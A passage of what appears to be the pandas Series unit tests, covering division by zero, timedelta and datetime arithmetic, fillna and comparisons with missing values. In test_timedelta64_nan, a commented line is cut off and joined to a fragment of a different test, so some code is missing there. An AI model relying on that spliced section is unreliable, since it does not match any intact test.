p['first']))\n\n # inf signing\n s = Series([np.nan,1.,-1.])\n result = s / 0\n expected = Series([np.nan,np.inf,-np.inf])\n assert_series_equal(result, expected)\n\n # float/integer issue\n # GH 7785\n p = DataFrame({'first': (1,0), 'second': (-0.01,-0.02)})\n expected = Series([-0.01,-np.inf])\n\n result = p['second'].div(p['first'])\n assert_series_equal(result, expected)\n\n result = p['second'] / p['first']\n assert_series_equal(result, expected)\n\n # GH 9144\n s = Series([-1, 0, 1])\n\n result = 0 / s\n expected = Series([0.0, nan, 0.0])\n assert_series_equal(result, expected)\n\n result = s / 0\n expected = Series([-inf, nan, inf])\n assert_series_equal(result, expected)\n\n result = s // 0\n expected = Series([-inf, nan, inf])\n assert_series_equal(result, expected)\n\n def test_operators(self):\n\n def _check_op(series, other, op, pos_only=False):\n left = np.abs(series) if pos_only else series\n right = np.abs(other) if pos_only else other\n\n cython_or_numpy = op(left, right)\n python = left.combine(right, op)\n tm.assert_almost_equal(cython_or_numpy, python)\n\n def check(series, other):\n simple_ops = ['add', 'sub', 'mul', 'truediv', 'floordiv', 'mod']\n\n for opname in simple_ops:\n _check_op(series, other, getattr(operator, opname))\n\n _check_op(series, other, operator.pow, pos_only=True)\n\n _check_op(series, other, lambda x, y: operator.add(y, x))\n _check_op(series, other, lambda x, y: operator.sub(y, x))\n _check_op(series, other, lambda x, y: operator.truediv(y, x))\n _check_op(series, other, lambda x, y: operator.floordiv(y, x))\n _check_op(series, other, lambda x, y: operator.mul(y, x))\n _check_op(series, other, lambda x, y: operator.pow(y, x),\n pos_only=True)\n _check_op(series, other, lambda x, y: operator.mod(y, x))\n\n check(self.ts, self.ts * 2)\n check(self.ts, self.ts * 0)\n check(self.ts, self.ts[::2])\n check(self.ts, 5)\n\n def check_comparators(series, other):\n _check_op(series, other, operator.gt)\n _check_op(series, other, operator.ge)\n _check_op(series, other, operator.eq)\n _check_op(series, other, operator.lt)\n _check_op(series, other, operator.le)\n\n check_comparators(self.ts, 5)\n check_comparators(self.ts, self.ts + 1)\n\n def test_operators_empty_int_corner(self):\n s1 = Series([], [], dtype=np.int32)\n s2 = Series({'x': 0.})\n tm.assert_series_equal(s1 * s2, Series([np.nan], index=['x']))\n\n def test_constructor_dtype_timedelta64(self):\n\n # basic\n td = Series([timedelta(days=i) for i in range(3)])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n td = Series([timedelta(days=1)])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n td = Series([timedelta(days=1),timedelta(days=2),np.timedelta64(1,'s')])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n # mixed with NaT\n from pandas import tslib\n td = Series([timedelta(days=1),tslib.NaT ], dtype='m8[ns]' )\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n td = Series([timedelta(days=1),np.nan ], dtype='m8[ns]' )\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n td = Series([np.timedelta64(300000000), pd.NaT],dtype='m8[ns]')\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n # improved inference\n # GH5689\n td = Series([np.timedelta64(300000000), pd.NaT])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n td = Series([np.timedelta64(300000000), tslib.iNaT])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n td = Series([np.timedelta64(300000000), np.nan])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n td = Series([pd.NaT, np.timedelta64(300000000)])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n td = Series([np.timedelta64(1,'s')])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n # these are frequency conversion astypes\n #for t in ['s', 'D', 'us', 'ms']:\n # self.assertRaises(TypeError, td.astype, 'm8[%s]' % t)\n\n # valid astype\n td.astype('int64')\n\n # invalid casting\n self.assertRaises(TypeError, td.astype, 'int32')\n\n # this is an invalid casting\n def f():\n Series([timedelta(days=1), 'foo'],dtype='m8[ns]')\n self.assertRaises(Exception, f)\n\n # leave as object here\n td = Series([timedelta(days=i) for i in range(3)] + ['foo'])\n self.assertEqual(td.dtype, 'object')\n\n # these will correctly infer a timedelta\n s = Series([None, pd.NaT, '1 Day'])\n self.assertEqual(s.dtype,'timedelta64[ns]')\n s = Series([np.nan, pd.NaT, '1 Day'])\n self.assertEqual(s.dtype,'timedelta64[ns]')\n s = Series([pd.NaT, None, '1 Day'])\n self.assertEqual(s.dtype,'timedelta64[ns]')\n s = Series([pd.NaT, np.nan, '1 Day'])\n self.assertEqual(s.dtype,'timedelta64[ns]')\n\n def test_operators_timedelta64(self):\n\n # invalid ops\n self.assertRaises(Exception, self.objSeries.__add__, 1)\n self.assertRaises(\n Exception, self.objSeries.__add__, np.array(1, dtype=np.int64))\n self.assertRaises(Exception, self.objSeries.__sub__, 1)\n self.assertRaises(\n Exception, self.objSeries.__sub__, np.array(1, dtype=np.int64))\n\n # seriese ops\n v1 = date_range('2012-1-1', periods=3, freq='D')\n v2 = date_range('2012-1-2', periods=3, freq='D')\n rs = Series(v2) - Series(v1)\n xp = Series(1e9 * 3600 * 24, rs.index).astype(\n 'int64').astype('timedelta64[ns]')\n assert_series_equal(rs, xp)\n self.assertEqual(rs.dtype, 'timedelta64[ns]')\n\n df = DataFrame(dict(A=v1))\n td = Series([timedelta(days=i) for i in range(3)])\n self.assertEqual(td.dtype, 'timedelta64[ns]')\n\n # series on the rhs\n result = df['A'] - df['A'].shift()\n self.assertEqual(result.dtype, 'timedelta64[ns]')\n\n result = df['A'] + td\n self.assertEqual(result.dtype, 'M8[ns]')\n\n # scalar Timestamp on rhs\n maxa = df['A'].max()\n tm.assert_isinstance(maxa, Timestamp)\n\n resultb = df['A'] - df['A'].max()\n self.assertEqual(resultb.dtype, 'timedelta64[ns]')\n\n # timestamp on lhs\n result = resultb + df['A']\n expected = Series(\n [Timestamp('20111230'), Timestamp('20120101'), Timestamp('20120103')])\n assert_series_equal(result, expected)\n\n # datetimes on rhs\n result = df['A'] - datetime(2001, 1, 1)\n expected = Series([timedelta(days=4017 + i) for i in range(3)])\n assert_series_equal(result, expected)\n self.assertEqual(result.dtype, 'm8[ns]')\n\n d = datetime(2001, 1, 1, 3, 4)\n resulta = df['A'] - d\n self.assertEqual(resulta.dtype, 'm8[ns]')\n\n # roundtrip\n resultb = resulta + d\n assert_series_equal(df['A'], resultb)\n\n # timedeltas on rhs\n td = timedelta(days=1)\n resulta = df['A'] + td\n resultb = resulta - td\n assert_series_equal(resultb, df['A'])\n self.assertEqual(resultb.dtype, 'M8[ns]')\n\n # roundtrip\n td = timedelta(minutes=5, seconds=3)\n resulta = df['A'] + td\n resultb = resulta - td\n assert_series_equal(df['A'], resultb)\n self.assertEqual(resultb.dtype, 'M8[ns]')\n\n # inplace\n value = rs[2] + np.timedelta64(timedelta(minutes=5,seconds=1))\n rs[2] += np.timedelta64(timedelta(minutes=5,seconds=1))\n self.assertEqual(rs[2], value)\n\n def test_timedeltas_with_DateOffset(self):\n\n # GH 4532\n # operate with pd.offsets\n s = Series([Timestamp('20130101 9:01'), Timestamp('20130101 9:02')])\n\n result = s + pd.offsets.Second(5)\n result2 = pd.offsets.Second(5) + s\n expected = Series(\n [Timestamp('20130101 9:01:05'), Timestamp('20130101 9:02:05')])\n assert_series_equal(result, expected)\n assert_series_equal(result2, expected)\n\n result = s + pd.offsets.Milli(5)\n result2 = pd.offsets.Milli(5) + s\n expected = Series(\n [Timestamp('20130101 9:01:00.005'), Timestamp('20130101 9:02:00.005')])\n assert_series_equal(result, expected)\n assert_series_equal(result2, expected)\n\n result = s + pd.offsets.Minute(5) + pd.offsets.Milli(5)\n expected = Series(\n [Timestamp('20130101 9:06:00.005'), Timestamp('20130101 9:07:00.005')])\n assert_series_equal(result, expected)\n\n # operate with np.timedelta64 correctly\n result = s + np.timedelta64(1, 's')\n result2 = np.timedelta64(1, 's') + s\n expected = Series(\n [Timestamp('20130101 9:01:01'), Timestamp('20130101 9:02:01')])\n assert_series_equal(result, expected)\n assert_series_equal(result2, expected)\n\n result = s + np.timedelta64(5, 'ms')\n result2 = np.timedelta64(5, 'ms') + s\n expected = Series(\n [Timestamp('20130101 9:01:00.005'), Timestamp('20130101 9:02:00.005')])\n assert_series_equal(result, expected)\n assert_series_equal(result2, expected)\n\n # valid DateOffsets\n for do in [ 'Hour', 'Minute', 'Second', 'Day', 'Micro',\n 'Milli', 'Nano' ]:\n op = getattr(pd.offsets,do)\n s + op(5)\n op(5) + s\n\n # invalid DateOffsets\n for do in [ 'Week', 'BDay', 'BQuarterEnd', 'BMonthEnd', 'BYearEnd',\n 'BYearBegin','BQuarterBegin', 'BMonthBegin',\n 'MonthEnd','YearBegin', 'YearEnd',\n 'MonthBegin', 'QuarterBegin' ]:\n op = getattr(pd.offsets,do)\n self.assertRaises(TypeError, s.__add__, op(5))\n self.assertRaises(TypeError, s.__radd__, op(5))\n\n def test_timedelta64_operations_with_timedeltas(self):\n\n # td operate with td\n td1 = Series([timedelta(minutes=5, seconds=3)] * 3)\n td2 = timedelta(minutes=5, seconds=4)\n result = td1 - td2\n expected = Series([timedelta(seconds=0)] * 3) -Series(\n [timedelta(seconds=1)] * 3)\n self.assertEqual(result.dtype, 'm8[ns]')\n assert_series_equal(result, expected)\n\n result2 = td2 - td1\n expected = (Series([timedelta(seconds=1)] * 3) -\n Series([timedelta(seconds=0)] * 3))\n assert_series_equal(result2, expected)\n\n # roundtrip\n assert_series_equal(result + td2,td1)\n\n # Now again, using pd.to_timedelta, which should build\n # a Series or a scalar, depending on input.\n td1 = Series(pd.to_timedelta(['00:05:03'] * 3))\n td2 = pd.to_timedelta('00:05:04')\n result = td1 - td2\n expected = Series([timedelta(seconds=0)] * 3) -Series(\n [timedelta(seconds=1)] * 3)\n self.assertEqual(result.dtype, 'm8[ns]')\n assert_series_equal(result, expected)\n\n result2 = td2 - td1\n expected = (Series([timedelta(seconds=1)] * 3) -\n Series([timedelta(seconds=0)] * 3))\n assert_series_equal(result2, expected)\n\n # roundtrip\n assert_series_equal(result + td2,td1)\n\n def test_timedelta64_operations_with_integers(self):\n\n # GH 4521\n # divide/multiply by integers\n startdate = Series(date_range('2013-01-01', '2013-01-03'))\n enddate = Series(date_range('2013-03-01', '2013-03-03'))\n\n s1 = enddate - startdate\n s1[2] = np.nan\n s2 = Series([2, 3, 4])\n expected = Series(s1.values.astype(np.int64) / s2, dtype='m8[ns]')\n expected[2] = np.nan\n result = s1 / s2\n assert_series_equal(result,expected)\n\n s2 = Series([20, 30, 40])\n expected = Series(s1.values.astype(np.int64) / s2, dtype='m8[ns]')\n expected[2] = np.nan\n result = s1 / s2\n assert_series_equal(result,expected)\n\n result = s1 / 2\n expected = Series(s1.values.astype(np.int64) / 2, dtype='m8[ns]')\n expected[2] = np.nan\n assert_series_equal(result,expected)\n\n s2 = Series([20, 30, 40])\n expected = Series(s1.values.astype(np.int64) * s2, dtype='m8[ns]')\n expected[2] = np.nan\n result = s1 * s2\n assert_series_equal(result,expected)\n\n for dtype in ['int32','int16','uint32','uint64','uint32','uint16','uint8']:\n s2 = Series([20, 30, 40],dtype=dtype)\n expected = Series(s1.values.astype(np.int64) * s2.astype(np.int64), dtype='m8[ns]')\n expected[2] = np.nan\n result = s1 * s2\n assert_series_equal(result,expected)\n\n result = s1 * 2\n expected = Series(s1.values.astype(np.int64) * 2, dtype='m8[ns]')\n expected[2] = np.nan\n assert_series_equal(result,expected)\n\n result = s1 * -1\n expected = Series(s1.values.astype(np.int64) * -1, dtype='m8[ns]')\n expected[2] = np.nan\n assert_series_equal(result,expected)\n\n # invalid ops\n for op in ['__true_div__','__div__','__mul__']:\n sop = getattr(s1,op,None)\n if sop is not None:\n self.assertRaises(TypeError, sop, s2.astype(float))\n self.assertRaises(TypeError, sop, 2.)\n\n for op in ['__add__','__sub__']:\n sop = getattr(s1,op,None)\n if sop is not None:\n self.assertRaises(TypeError, sop, 1)\n self.assertRaises(TypeError, sop, s2.values)\n\n def test_timedelta64_conversions(self):\n startdate = Series(date_range('2013-01-01', '2013-01-03'))\n enddate = Series(date_range('2013-03-01', '2013-03-03'))\n\n s1 = enddate - startdate\n s1[2] = np.nan\n\n for m in [1, 3, 10]:\n for unit in ['D','h','m','s','ms','us','ns']:\n\n # op\n expected = s1.apply(lambda x: x / np.timedelta64(m,unit))\n result = s1 / np.timedelta64(m,unit)\n assert_series_equal(result, expected)\n\n if m == 1 and unit != 'ns':\n\n # astype\n result = s1.astype(\"timedelta64[{0}]\".format(unit))\n assert_series_equal(result, expected)\n\n # reverse op\n expected = s1.apply(lambda x: np.timedelta64(m,unit) / x)\n result = np.timedelta64(m,unit) / s1\n\n # astype\n s = Series(date_range('20130101',periods=3))\n result = s.astype(object)\n self.assertIsInstance(result.iloc[0],datetime)\n self.assertTrue(result.dtype == np.object_)\n\n result = s1.astype(object)\n self.assertIsInstance(result.iloc[0],timedelta)\n self.assertTrue(result.dtype == np.object_)\n\n def test_timedelta64_equal_timedelta_supported_ops(self):\n ser = Series([Timestamp('20130301'), Timestamp('20130228 23:00:00'),\n Timestamp('20130228 22:00:00'),\n Timestamp('20130228 21:00:00')])\n\n intervals = 'D', 'h', 'm', 's', 'us'\n npy16_mappings = {'D': 24 * 60 * 60 * 1000000, 'h': 60 * 60 * 1000000,\n 'm': 60 * 1000000, 's': 1000000, 'us': 1}\n\n def timedelta64(*args):\n return sum(starmap(np.timedelta64, zip(args, intervals)))\n\n for op, d, h, m, s, us in product([operator.add, operator.sub],\n *([range(2)] * 5)):\n nptd = timedelta64(d, h, m, s, us)\n pytd = timedelta(days=d, hours=h, minutes=m, seconds=s,\n microseconds=us)\n lhs = op(ser, nptd)\n rhs = op(ser, pytd)\n\n try:\n assert_series_equal(lhs, rhs)\n except:\n raise AssertionError(\n \"invalid comparsion [op->{0},d->{1},h->{2},m->{3},s->{4},us->{5}]\\n{6}\\n{7}\\n\".format(op, d, h, m, s, us, lhs, rhs))\n\n def test_timedelta_assignment(self):\n # GH 8209\n s = Series([])\n s.loc['B'] = timedelta(1)\n tm.assert_series_equal(s,Series(Timedelta('1 days'),index=['B']))\n\n s = s.reindex(s.index.insert(0, 'A'))\n tm.assert_series_equal(s,Series([np.nan,Timedelta('1 days')],index=['A','B']))\n\n result = s.fillna(timedelta(1))\n expected = Series(Timedelta('1 days'),index=['A','B'])\n tm.assert_series_equal(result, expected)\n\n s.loc['A'] = timedelta(1)\n tm.assert_series_equal(s, expected)\n\n def test_operators_datetimelike(self):\n\n def run_ops(ops, get_ser, test_ser):\n for op in ops:\n try:\n op = getattr(get_ser, op, None)\n if op is not None:\n self.assertRaises(TypeError, op, test_ser)\n except:\n com.pprint_thing(\"Failed on op %r\" % op)\n raise\n ### timedelta64 ###\n td1 = Series([timedelta(minutes=5,seconds=3)]*3)\n td2 = timedelta(minutes=5,seconds=4)\n ops = ['__mul__','__floordiv__','__pow__',\n '__rmul__','__rfloordiv__','__rpow__']\n run_ops(ops, td1, td2)\n td1 + td2\n td2 + td1\n td1 - td2\n td2 - td1\n td1 / td2\n td2 / td1\n\n ### datetime64 ###\n dt1 = Series([Timestamp('20111230'), Timestamp('20120101'),\n Timestamp('20120103')])\n dt2 = Series([Timestamp('20111231'), Timestamp('20120102'),\n Timestamp('20120104')])\n ops = ['__add__', '__mul__', '__floordiv__', '__truediv__', '__div__',\n '__pow__', '__radd__', '__rmul__', '__rfloordiv__',\n '__rtruediv__', '__rdiv__', '__rpow__']\n run_ops(ops, dt1, dt2)\n dt1 - dt2\n dt2 - dt1\n\n ### datetime64 with timetimedelta ###\n ops = ['__mul__', '__floordiv__', '__truediv__', '__div__', '__pow__',\n '__rmul__', '__rfloordiv__', '__rtruediv__', '__rdiv__',\n '__rpow__']\n run_ops(ops, dt1, td1)\n dt1 + td1\n td1 + dt1\n dt1 - td1\n # TODO: Decide if this ought to work.\n # td1 - dt1\n\n ### timetimedelta with datetime64 ###\n ops = ['__sub__', '__mul__', '__floordiv__', '__truediv__', '__div__',\n '__pow__', '__rsub__', '__rmul__', '__rfloordiv__',\n '__rtruediv__', '__rdiv__', '__rpow__']\n run_ops(ops, td1, dt1)\n td1 + dt1\n dt1 + td1\n\n def test_ops_datetimelike_align(self):\n # GH 7500\n # datetimelike ops need to align\n dt = Series(date_range('2012-1-1', periods=3, freq='D'))\n dt.iloc[2] = np.nan\n dt2 = dt[::-1]\n\n expected = Series([timedelta(0),timedelta(0),pd.NaT])\n\n result = dt2-dt\n assert_series_equal(result,expected)\n\n result = (dt2.to_frame()-dt.to_frame())[0]\n assert_series_equal(result,expected)\n\n def test_timedelta64_functions(self):\n\n from datetime import timedelta\n from pandas import date_range\n\n # index min/max\n td = Series(date_range('2012-1-1', periods=3, freq='D')) - \\\n Timestamp('20120101')\n\n result = td.idxmin()\n self.assertEqual(result, 0)\n\n result = td.idxmax()\n self.assertEqual(result, 2)\n\n # GH 2982\n # with NaT\n td[0] = np.nan\n\n result = td.idxmin()\n self.assertEqual(result, 1)\n\n result = td.idxmax()\n self.assertEqual(result, 2)\n\n # abs\n s1 = Series(date_range('20120101', periods=3))\n s2 = Series(date_range('20120102', periods=3))\n expected = Series(s2 - s1)\n\n # this fails as numpy returns timedelta64[us]\n #result = np.abs(s1-s2)\n # assert_frame_equal(result,expected)\n\n result = (s1 - s2).abs()\n assert_series_equal(result, expected)\n\n # max/min\n result = td.max()\n expected = Timedelta('2 days')\n self.assertEqual(result, expected)\n\n result = td.min()\n expected = Timedelta('1 days')\n self.assertEqual(result, expected)\n\n def test_ops_consistency_on_empty(self):\n\n # GH 7869\n # consistency on empty\n\n # float\n result = Series(dtype=float).sum()\n self.assertEqual(result,0)\n\n result = Series(dtype=float).mean()\n self.assertTrue(isnull(result))\n\n result = Series(dtype=float).median()\n self.assertTrue(isnull(result))\n\n # timedelta64[ns]\n result = Series(dtype='m8[ns]').sum()\n self.assertEqual(result, Timedelta(0))\n\n result = Series(dtype='m8[ns]').mean()\n self.assertTrue(result is pd.NaT)\n\n result = Series(dtype='m8[ns]').median()\n self.assertTrue(result is pd.NaT)\n\n def test_timedelta_fillna(self):\n #GH 3371\n s = Series([Timestamp('20130101'), Timestamp('20130101'),\n Timestamp('20130102'), Timestamp('20130103 9:01:01')])\n td = s.diff()\n\n # reg fillna\n result = td.fillna(0)\n expected = Series([timedelta(0), timedelta(0), timedelta(1),\n timedelta(days=1, seconds=9*3600+60+1)])\n assert_series_equal(result, expected)\n\n # interprested as seconds\n result = td.fillna(1)\n expected = Series([timedelta(seconds=1), timedelta(0),\n timedelta(1), timedelta(days=1, seconds=9*3600+60+1)])\n assert_series_equal(result, expected)\n\n result = td.fillna(timedelta(days=1, seconds=1))\n expected = Series([timedelta(days=1, seconds=1), timedelta(0),\n timedelta(1), timedelta(days=1, seconds=9*3600+60+1)])\n assert_series_equal(result, expected)\n\n result = td.fillna(np.timedelta64(int(1e9)))\n expected = Series([timedelta(seconds=1), timedelta(0), timedelta(1),\n timedelta(days=1, seconds=9*3600+60+1)])\n assert_series_equal(result, expected)\n\n from pandas import tslib\n result = td.fillna(tslib.NaT)\n expected = Series([tslib.NaT, timedelta(0), timedelta(1),\n timedelta(days=1, seconds=9*3600+60+1)], dtype='m8[ns]')\n assert_series_equal(result, expected)\n\n # ffill\n td[2] = np.nan\n result = td.ffill()\n expected = td.fillna(0)\n expected[0] = np.nan\n assert_series_equal(result, expected)\n\n # bfill\n td[2] = np.nan\n result = td.bfill()\n expected = td.fillna(0)\n expected[2] = timedelta(days=1, seconds=9*3600+60+1)\n assert_series_equal(result, expected)\n\n def test_datetime64_fillna(self):\n\n s = Series([Timestamp('20130101'), Timestamp('20130101'),\n Timestamp('20130102'), Timestamp('20130103 9:01:01')])\n s[2] = np.nan\n\n # reg fillna\n result = s.fillna(Timestamp('20130104'))\n expected = Series([Timestamp('20130101'), Timestamp('20130101'),\n Timestamp('20130104'), Timestamp('20130103 9:01:01')])\n assert_series_equal(result, expected)\n\n from pandas import tslib\n result = s.fillna(tslib.NaT)\n expected = s\n assert_series_equal(result, expected)\n\n # ffill\n result = s.ffill()\n expected = Series([Timestamp('20130101'), Timestamp('20130101'),\n Timestamp('20130101'), Timestamp('20130103 9:01:01')])\n assert_series_equal(result, expected)\n\n # bfill\n result = s.bfill()\n expected = Series([Timestamp('20130101'), Timestamp('20130101'),\n Timestamp('20130103 9:01:01'),\n Timestamp('20130103 9:01:01')])\n assert_series_equal(result, expected)\n\n # GH 6587\n # make sure that we are treating as integer when filling\n # this also tests inference of a datetime-like with NaT's\n s = Series([pd.NaT, pd.NaT, '2013-08-05 15:30:00.000001'])\n expected = Series(['2013-08-05 15:30:00.000001', '2013-08-05 15:30:00.000001', '2013-08-05 15:30:00.000001'], dtype='M8[ns]')\n result = s.fillna(method='backfill')\n assert_series_equal(result, expected)\n\n def test_fillna_int(self):\n s = Series(np.random.randint(-100, 100, 50))\n s.fillna(method='ffill', inplace=True)\n assert_series_equal(s.fillna(method='ffill', inplace=False), s)\n\n def test_fillna_raise(self):\n s = Series(np.random.randint(-100, 100, 50))\n self.assertRaises(TypeError, s.fillna, [1, 2])\n self.assertRaises(TypeError, s.fillna, (1, 2))\n\n def test_raise_on_info(self):\n s = Series(np.random.randn(10))\n with tm.assertRaises(AttributeError):\n s.info()\n\n def test_isnull_for_inf(self):\n s = Series(['a', np.inf, np.nan, 1.0])\n with pd.option_context('mode.use_inf_as_null', True):\n r = s.isnull()\n dr = s.dropna()\n e = Series([False, True, True, False])\n de = Series(['a', 1.0], index=[0, 3])\n tm.assert_series_equal(r, e)\n tm.assert_series_equal(dr, de)\n\n\n# TimeSeries-specific\n\n def test_fillna(self):\n ts = Series([0., 1., 2., 3., 4.], index=tm.makeDateIndex(5))\n\n self.assert_numpy_array_equal(ts, ts.fillna(method='ffill'))\n\n ts[2] = np.NaN\n\n self.assert_numpy_array_equal(ts.fillna(method='ffill'),\n [0., 1., 1., 3., 4.])\n self.assert_numpy_array_equal(ts.fillna(method='backfill'),\n [0., 1., 3., 3., 4.])\n\n self.assert_numpy_array_equal(ts.fillna(value=5), [0., 1., 5., 3., 4.])\n\n self.assertRaises(ValueError, ts.fillna)\n self.assertRaises(ValueError, self.ts.fillna, value=0, method='ffill')\n\n # GH 5703\n s1 = Series([np.nan])\n s2 = Series([1])\n result = s1.fillna(s2)\n expected = Series([1.])\n assert_series_equal(result,expected)\n result = s1.fillna({})\n assert_series_equal(result,s1)\n result = s1.fillna(Series(()))\n assert_series_equal(result,s1)\n result = s2.fillna(s1)\n assert_series_equal(result,s2)\n result = s1.fillna({ 0 : 1})\n assert_series_equal(result,expected)\n result = s1.fillna({ 1 : 1})\n assert_series_equal(result,Series([np.nan]))\n result = s1.fillna({ 0 : 1, 1 : 1})\n assert_series_equal(result,expected)\n result = s1.fillna(Series({ 0 : 1, 1 : 1}))\n assert_series_equal(result,expected)\n result = s1.fillna(Series({ 0 : 1, 1 : 1},index=[4,5]))\n assert_series_equal(result,s1)\n\n s1 = Series([0, 1, 2], list('abc'))\n s2 = Series([0, np.nan, 2], list('bac'))\n result = s2.fillna(s1)\n expected = Series([0,0,2.], list('bac'))\n assert_series_equal(result,expected)\n\n # limit\n s = Series(np.nan,index=[0,1,2])\n result = s.fillna(999,limit=1)\n expected = Series([999,np.nan,np.nan],index=[0,1,2])\n assert_series_equal(result,expected)\n\n result = s.fillna(999,limit=2)\n expected = Series([999,999,np.nan],index=[0,1,2])\n assert_series_equal(result,expected)\n\n def test_fillna_bug(self):\n x = Series([nan, 1., nan, 3., nan], ['z', 'a', 'b', 'c', 'd'])\n filled = x.fillna(method='ffill')\n expected = Series([nan, 1., 1., 3., 3.], x.index)\n assert_series_equal(filled, expected)\n\n filled = x.fillna(method='bfill')\n expected = Series([1., 1., 3., 3., nan], x.index)\n assert_series_equal(filled, expected)\n\n def test_fillna_inplace(self):\n x = Series([nan, 1., nan, 3., nan], ['z', 'a', 'b', 'c', 'd'])\n y = x.copy()\n\n y.fillna(value=0, inplace=True)\n\n expected = x.fillna(value=0)\n assert_series_equal(y, expected)\n\n def test_fillna_invalid_method(self):\n try:\n self.ts.fillna(method='ffil')\n except ValueError as inst:\n self.assertIn('ffil', str(inst))\n\n def test_ffill(self):\n ts = Series([0., 1., 2., 3., 4.], index=tm.makeDateIndex(5))\n ts[2] = np.NaN\n assert_series_equal(ts.ffill(), ts.fillna(method='ffill'))\n\n def test_bfill(self):\n ts = Series([0., 1., 2., 3., 4.], index=tm.makeDateIndex(5))\n ts[2] = np.NaN\n assert_series_equal(ts.bfill(), ts.fillna(method='bfill'))\n\n def test_sub_of_datetime_from_TimeSeries(self):\n from pandas.tseries.timedeltas import to_timedelta\n from datetime import datetime\n a = Timestamp(datetime(1993, 0o1, 0o7, 13, 30, 00))\n b = datetime(1993, 6, 22, 13, 30)\n a = Series([a])\n result = to_timedelta(np.abs(a - b))\n self.assertEqual(result.dtype, 'timedelta64[ns]')\n\n def test_datetime64_with_index(self):\n\n # arithmetic integer ops with an index\n s = Series(np.random.randn(5))\n expected = s-s.index.to_series()\n result = s-s.index\n assert_series_equal(result,expected)\n\n # GH 4629\n # arithmetic datetime64 ops with an index\n s = Series(date_range('20130101',periods=5),index=date_range('20130101',periods=5))\n expected = s-s.index.to_series()\n result = s-s.index\n assert_series_equal(result,expected)\n\n result = s-s.index.to_period()\n assert_series_equal(result,expected)\n\n df = DataFrame(np.random.randn(5,2),index=date_range('20130101',periods=5))\n df['date'] = Timestamp('20130102')\n df['expected'] = df['date'] - df.index.to_series()\n df['result'] = df['date'] - df.index\n assert_series_equal(df['result'],df['expected'])\n\n def test_timedelta64_nan(self):\n\n from pandas import tslib\n td = Series([timedelta(days=i) for i in range(10)])\n\n # nan ops on timedeltas\n td1 = td.copy()\n td1[0] = np.nan\n self.assertTrue(isnull(td1[0]))\n self.assertEqual(td1[0].value, tslib.iNaT)\n td1[0] = td[0]\n self.assertFalse(isnull(td1[0]))\n\n td1[1] = tslib.iNaT\n self.assertTrue(isnull(td1[1]))\n self.assertEqual(td1[1].value, tslib.iNaT)\n td1[1] = td[1]\n self.assertFalse(isnull(td1[1]))\n\n td1[2] = tslib.NaT\n self.assertTrue(isnull(td1[2]))\n self.assertEqual(td1[2].value, tslib.iNaT)\n td1[2] = td[2]\n self.assertFalse(isnull(td1[2]))\n\n # boolean setting\n # this doesn't work, not sure numpy even supports it\n #result = td[(td>np.timedelta64(timedelta(days=3))) & (td= -0.5) & (self.ts <= 0.5)\n # assert_series_equal(selector, expected)\n\n def test_operators_na_handling(self):\n from decimal import Decimal\n from datetime import date\n s = Series([Decimal('1.3'), Decimal('2.3')],\n index=[date(2012, 1, 1), date(2012, 1, 2)])\n\n result = s + s.shift(1)\n result2 = s.shift(1) + s\n self.assertTrue(isnull(result[0]))\n self.assertTrue(isnull(result2[0]))\n\n s = Series(['foo', 'bar', 'baz', np.nan])\n result = 'prefix_' + s\n expected = Series(['prefix_foo', 'prefix_bar', 'prefix_baz', np.nan])\n assert_series_equal(result, expected)\n\n result = s + '_suffix'\n expected = Series(['foo_suffix', 'bar_suffix', 'baz_suffix', np.nan])\n assert_series_equal(result, expected)\n\n def test_object_comparisons(self):\n s = Series(['a', 'b', np.nan, 'c', 'a'])\n\n result = s == 'a'\n expected = Series([True, False, False, False, True])\n assert_series_equal(result, expected)\n\n result = s < 'a'\n expected = Series([False, False, False, False, False])\n assert_series_equal(result, expected)\n\n result = s != 'a'\n expected = -(s == 'a')\n assert_series_equal(result, expected)\n\n def test_comparison_operators_with_nas(self):\n s = Series(bdate_range('1/1/2000', periods=10), dtype=object)\n s[::2] = np.nan\n\n # test that comparisons work\n ops = ['lt', 'le', 'gt', 'ge', 'eq', 'ne']\n for op in ops:\n val = s[5]\n\n f = getattr(operator, op)\n result = f(s, val)\n\n expected = f(s.dropna(), val).reindex(s.index)\n\n if op == 'ne':\n expected = expected.fillna(True).astype(bool)\n else:\n expected = expected.fillna(False).astype(bool)\n\n assert_series_equal(result, expected)\n\n # fffffffuuuuuuuuuuuu\n # result = f(val, s)\n # expected = f(val, s.dropna()).reindex(s.index)\n # assert_series_equal(result, expected)\n\n # boolean &, |, ^ should work with object arrays and propagate NAs\n\n ops = ['and_', 'or_', 'xor']\n mask = s.isnull()\n for bool_op in ops:\n f = getattr(operator, bool_op)\n\n filled = s.fillna(s[0])\n\n result = f(s < s[9], s > s[3])\n\n expected = f(filled < filled[9], filled > filled[3])\n expected[mask] = False\n assert_series_equal(result, expected)\n\n def test_comparison_object_numeric_nas(self):\n s = Series(np.random.randn(10), dtype=object)\n shifted = s.shift(2)\n\n ops = ['lt', 'le', 'gt', 'ge', 'eq', 'ne']\n for op in ops:\n f = getattr(operator, op)\n\n result = f(s, shifted)\n expected = f(s.astype(float), shifted.astype(float))\n assert_series_equal(result, expected)\n\n def test_comparison_invalid(self):\n\n # GH4968\n # invalid date/int comparisons\n s = Series(range(5))\n s2 = Series(date_range('20010101', periods=5))\n\n for (x, y) in [(s,s2),(s2,s)]:\n self.assertRaises(TypeError, lambda : x == y)\n self.assertRaises(TypeError, lambda : x != y)\n self.assertRaises(TypeError, lambda : x >= y)\n self.assertRaises(TypeError, lambda : x > y)\n self.assertRaises(TypeError, lambda : x < y)\n self.assertRaises(TypeError, lambda : x <= y)\n\n def test_more_na_comparisons(self):\n left = Series(['a', np.nan, 'c'])\n right = Series(['a', np.nan, 'd'])\n\n result = left == right\n expected = Series([True, False, False])\n assert_series_equal(result, expected)\n\n result = left != right\n expected = Series([False, True, True])\n assert_series_equal(result, expected)\n\n result = left == np.nan\n expected = Series([False, False, False])\n assert_series_equal(result, expected)\n\n result = left != np.nan\n expected = Series([True, True, True])\n assert_series_equal(result, 